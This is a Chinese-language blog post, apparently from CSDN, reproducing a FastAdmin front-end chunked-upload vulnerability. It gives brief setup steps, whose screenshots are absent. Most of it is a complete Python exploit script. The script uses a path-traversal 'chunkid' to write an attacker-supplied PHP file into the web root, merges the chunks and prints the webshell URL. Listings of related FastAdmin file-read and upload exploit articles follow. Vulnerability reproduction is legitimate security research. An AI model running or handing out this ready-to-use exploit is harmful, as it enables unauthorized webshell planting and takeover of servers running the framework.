fastadmin前台分片漏洞

已于 2023-02-06 15:19:24 修改
阅读量3.4k 收藏 4
点赞数
分类专栏: 漏洞复现 文章标签: 安全
于 2022-12-05 10:43:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fiverya/article/details/128182641
版权

参考链接:

fastadmin安装

fastadmin安装

前台分片漏洞复现:

https://blog.csdn.net/weixin_43288600/article/details/121192252

https://blog.csdn.net/u013921288/article/details/117670844

https://xz.aliyun.com/t/9395

FastAdmin最新RCE漏洞复现

https://www.secpulse.com/archives/157307.html

搭建好环境后,查看服务器ip:

注册账号,在上传页面进行抓包:

数据包如下:

发送到repeater:

构造分片数据包并发送:

可以发现在chunk文件夹下发现php文件已经成功上传。

测试发现,设定网站的根目录为 /public 之后就无法访问  runtime/chunks 下的文件,因此将上传文件路径改为

再次发送数据包,在根目录下成功上传文件:

访问成功,可以显示php文件中的内容。

撰写利用代码并在kali中执行:

浏览器访问webshel路径

Webshell上传成功

exp:

import sys
import requests
from time import time
from json import loads

headers = {
	'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36',
}

def banner():
	RED = '\033[31m'
	print(f"""
		{RED}  _____         _      _       _           _       
 |  ___|_ _ ___| |_   / \   __| |_ __ ___ (_)_ __  
 | |_ / _` / __| __| / _ \ / _` | '_ ` _ \| | '_ \ 
 |  _| (_| \__ \ |_ / ___ \ (_| | | | | | | | | | |
 |_|  \__,_|___/\__/_/   \_\__,_|_| |_| |_|_|_| |_|
                         Author: Search?=Null                          
	""")

def upload_chunk(url):
	upload_url = url.rstrip('/') + '/index/ajax/upload'
	file = {
		'file': ('%d.php' % time(), open('hhh.php', 'rb'), 'application/octet-stream')
	}
	chunk_id = time()
	data_ = {
		'chunkid': '../../public/%d.php' % chunk_id,
		'chunkindex': 0,
		'chunkcount': 1
	}
	resp = requests.post(
		upload_url,
		headers = headers,
		files = file,
		data = data_
	)
	result = loads(resp.text)
	if result['code'] == 1 and result['msg'] == '' and result['data'] == None:
		merge_file(upload_url, chunk_id)
		print('\nWebshell: %s/%d.php' % (url.rstrip('/'), chunk_id))
	elif result['msg'] != '':
                print(f"Not Vulnerability, {result['msg']}.")
	else:
		print('Not Vulnerability.')

def merge_file(url, chunk_id):
	data_ = {
		'action': 'merge',
		'chunkid': '../../public/%d.php' % chunk_id,
		'chunkindex': 0,
		'chunkcount': 1,
		'filename': '%d.php-0.part' % chunk_id
	}
	resp = requests.post(
		url,
		headers = headers,
		data = data_
	)

def main():
	global headers
	banner()
	if len(sys.argv) == 2:
		try:
			headers['Cookie'] = input('Cookie > ')
			upload_chunk(sys.argv[1])
		except Exception as e:
			print(e)
	else:
		print('Usage: python3 FastAdmin.py url')

if __name__ == "__main__":
	main()

耳语吖
关注
专栏目录
FastAdmin后台开发框架 lang 任意文件读取漏洞复现
0xSec
06-17 2677
FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
通达OA低版本文件上传+apache解析漏洞getshell
谢公子的博客
05-12 2004
目录 漏洞文件 漏洞利用条件 漏洞复现 漏洞文件 /general/vmeet/privateUpload.php 漏洞利用条件 通达OA低版本 apache存在解析漏洞 漏洞复现 测试环境:通达OA 2008,apache存在解析漏洞 首先访问是否存在该文件 存在的话,将下面代码保存后缀为1.html文件,然后将木马命名为 aaa.php.1,与1.html在同一个目录下 <form id="frmUpload" enctype="multipart/for..
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
php代码审计之变量覆盖漏洞 变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等。 全局变量覆盖 extarct()变量覆盖 遍历初始化变量 import_request_variables变量覆盖 parse_str()变量覆盖 变量覆盖的种类 全局变量覆盖(PHP5.3.0废弃、PHP5.4.0移除) 当register_global=ON时,变量来源可能是各个不同的地方,比如页面的表单、cookie等 "; if(ini_get("Register_globals"))foreach ($_REQUEST as $k => $v) unset(${$k}); print $a; print $_GET[b]; ?> extract()变量覆盖 PHP extract()函数从数组中把变量导入到当前的符号表中。对于数组中的每个元素,键名用于变量值
漏洞复现】FastAdmin——lang——任意文件读取漏洞
LongL_GuYu的博客
06-27 2709
FastAdmin是一个免费开源的后台管理框架,其lang存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。
Fastadmin 前台任意文件读取漏洞
最新发布
2301_77012231的博客
09-28 233
FastAdmin是一个基于ThinkPHP5和Bootstrap的后台开发框架,支持权限管理、响应式开发、多语言、模块化开发、CRUD和自由可扩展等功能。
fastAdmin lang接口任意文件读取漏洞(内含XrayPoC)
WuYSec的博客
06-18 1224
fastAdmin是一款基于ThinkPHP和Bootstrap开发的开源后台管理框架,旨在帮助开发者快速构建高效、灵活的后台管理系统。fastAdmin存在任意文件读取漏洞,可直接读取数据库配置文件。
(新接口)用友NC某接口存在任意文件读取漏洞-0day
weixin_43167326的博客
02-22 1660
用友NC是一款企业级ERP(企业资源计划)软件,它提供了全面的财务、人力资源、采购、销售、生产等各种业务管理模块,适用于中小型企业和大型集团公司。用友NC具有良好的可扩展性和可定制性,可以满足企业在不同行业和不同规模下的管理需求。该系统基于Java EE技术开发,具有跨平台、集成度高、业务流程自动化、信息共享等特点,能够有效提高企业的管理效率和降低成本,是众多企业的首选管理软件。。
fastadmin(V1.0.0.20200506_beta) 前台 getshell(文件上传解析) 漏洞分析1
08-03
2、在 linux 下, is_file() 函数判可用于判断符号链接 3、在 linux 下, is_file 函数会受到权限的影响,当前用户权限不足或父目录
FastAdmin_Upload:FastAdmin 前台文件上传RCE
04-06
FastAdmin前台文件上传RCE(远程命令执行)漏洞正是这样一种安全隐患,它允许攻击者通过上传特定格式的文件,绕过安全检查,进而执行任意系统命令。 首先,我们需要了解FastAdmin的文件上传流程。在FastAdmin中,...
fastadmin前台getshell漏洞分析
weixin_39811856的博客
02-20 2561
首先是环境复现 漏洞利用条件:usercenter=>true 漏洞文件:\application\index\controller\User.php 登陆会员中心,在个人资料页面中修改个人头像: 在该页面进行图像上传(上传文件为1.jpg) 修改图片内容,且不能修改掉jpg文件标识字节: 上传成功: 记录下路径后,成功getshell http://192.168.148.xx/fastadmin/public/index/user/_empty?name=../.
fastadmin 七牛云
12-28
另外,针对大文件上传,可以利用七牛云的分片上传功能,提高上传速度和稳定性。 总结,FastAdmin集成七牛云组件可以带来诸多好处,如高效的静态资源管理、全球范围的CDN加速,以及丰富的多媒体处理服务。开发者只需...
FastAdmin 用户权限RCE.md
04-26
FastAdmin 用户权限RCE
fastadmin+vue nginx部署
01-07
# 疫情管控 server { listen 80; #server_name ; index index.php index.html index.htm default.php default.htm default.html; root /var/... location /fe{ ...-e $request_filenam
漏洞预警】FastAdmin框架任意文件读取漏洞
晚风不及你
06-11 2713
FastAdmin是一个基于ThinkPHP和Bootstrap的快速开发的后台管理系统框架。FastAdmin框架存在文件读取漏洞漏洞,攻击者利用此漏洞可以获取系统敏感信息。
FastAdmin前台分片传输上传文件getshell
若把此心以学道,即身成佛有何难
10-14 1268
道虽远,行则易至;儒虽难,坚为易成
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 1036
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
tp5 webshell漏洞,文件被篡改,fastadmin老版本的存在此问题,解决方法
qq_41409720的博客
08-30 3041
1.首先是把攻击文件清理。 找攻击文件的方式有在静态文件目录查找后缀为 “.php”的文件就好了 2.修改tp5底层的一个漏洞: 修改第一个文件 yourpath\thinkphp\library\think\App.php 搜索 public static function module( 找到 ==》 // 获取控制器名 $controller = stri...
FastAdmin 任意文件读取漏洞复现
网安小白
09-04 960
FastAdmin 后台框架开源且可以免费商用,一键生成 CRUD, FastAdmin 是一款基于 ThinkPHP 和 Bootstrap 的极速后台开发框架,基于Auth验证的权限管理系统,一键生成 CRUD,自动生成控制器、模型、视图、JS、语言包、菜单、回收站等。(Fast Admin 极速 后台 框架)Fastadmin框架 lang接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
fastadmin前台编辑器
07-28
FastAdmin是一个基于ThinkPHP框架开发的快速后台开发框架,它提供了丰富的功能和组件,包括前台编辑器。 在FastAdmin中,你可以使用UEditor作为前台编辑器。UEditor是一个功能强大的富文本编辑器,支持图片上传、文件上传、代码高亮等功能。你可以在FastAdmin的配置文件中配置UEditor,然后在前台页面中引入UEditor的JS和CSS文件,并调用相应的方法来初始化编辑器。 另外,FastAdmin还支持其他前台编辑器,比如Markdown编辑器、Simditor编辑器等,你可以根据自己的需求选择合适的编辑器来使用。在FastAdmin的扩展市场中,也有一些第三方开发的编辑器插件可供选择和使用。 总之,FastAdmin提供了丰富的选择和配置功能,你可以根据自己的需求来选择合适的前台编辑器,并在前端页面中进行相应的配置和调用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值